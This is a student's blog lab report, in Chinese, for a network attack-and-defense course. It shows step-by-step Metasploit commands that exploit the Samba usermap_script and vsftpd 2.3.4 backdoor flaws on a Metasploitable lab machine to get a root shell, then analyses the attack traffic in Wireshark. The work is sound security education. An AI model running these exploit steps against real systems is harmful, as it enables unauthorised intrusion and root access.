• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录

wangJL02

  • 博客园
  • 联系
  • 订阅
  • 管理

公告

View Post

20242827 2024-2025-2 《网络攻防实践》实践7报告

20242827 2024-2025-2 《网络攻防实践》实践7报告

1.实践内容

1.1 使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

1.2 实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

本次实验中使用到的虚拟机及其对应的IP地址如下:
kali: 192.168.200.65
Metasploitable: 192.168.200.123

在kali上启动msfconsole(首先要输入sudo su)

然后输入 use exploit/multi/samba/usermap_script,本次实验使用usermap_script漏洞,然后输入 show payloads显示所有可用载荷,本次攻击就选用20号reverse相关载荷。

使用命令 set payload 20设置,之后设置攻击机与靶机,与上次实验操作一致。

set LHOST 192.168.200.65
set RHOST 192.168.200.123

设置完成后通过show options,查看详细信息。

然后使用exploit开始攻击,紧接着进入shell模式,输入whoami查看权限,发现是root权限。

2.2 实践作业:攻防对抗实践

本次实验中使用到的虚拟机及其对应的IP地址如下:
kali: 192.168.200.65
Metasploitable: 192.168.200.123

首先进行连通性测试

可以相互ping通,之后在kali上扫描靶机漏洞

输入search vsftpd查看漏洞信息

输入命令use exploit/unix/ftp/vsftpd_234_backdoor进入漏洞所在文件,输入show options查看攻击此漏洞需要的设置

通过使用 set payload /cmd/unix/interact命令设置此次攻击,然后,输入set LHOST 192.168.200.65 、set RHOST 192.168.200.123
设置进行攻击的主机为kali,受到攻击的主机为meta
输入run命令进行攻击,成功之后输入whoami查看权限,输入ifconfig查看靶机网络信息

在进行攻击时打开wireshark输入ip.addr == 192.168.200.65 and ip.addr == 192.168.200.123进行捕包,可以看出攻击机IP地址为192.168.200.65,靶机IP地址为192.168.200.123,可以查看到攻击端口。
查看tcp流可以看到攻击机的命令和攻击时用到的漏洞信息。

我们也可以
首先,打开Metasploit
输入以下命令进行vsftp渗透攻击

use exploit/unix/ftp/vsftpd_234_backdoor
set LHOST 192.168.200.65
set RHOST 192.168.200.123
show options
exploit

输入攻击,成功获取shell
输入以下命令,进入usr文件夹下,创建一个名为wangjl的文件夹。

攻击成功!

3.学习中遇到的问题及解决

本次实验与上次实验雷同,只是将Windows靶机换成了Linux,所以实验非常顺利。

  • 问题1:虚拟机的IP地址出现问题
  • 问题1解决方案:改回之前的设置就好了

4.实践总结

本次实验中实践一进行很顺利,与上次实验很相似,但是我也意识到对漏洞方面知识的掌握还不够深入,局限于书本和视频中的知识,以后要更多的学习课外知识,多多进行实践。

posted on 2025-04-10 12:59  Wang_JL  阅读(40)  评论(0)    收藏  举报

刷新页面返回顶部
 
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3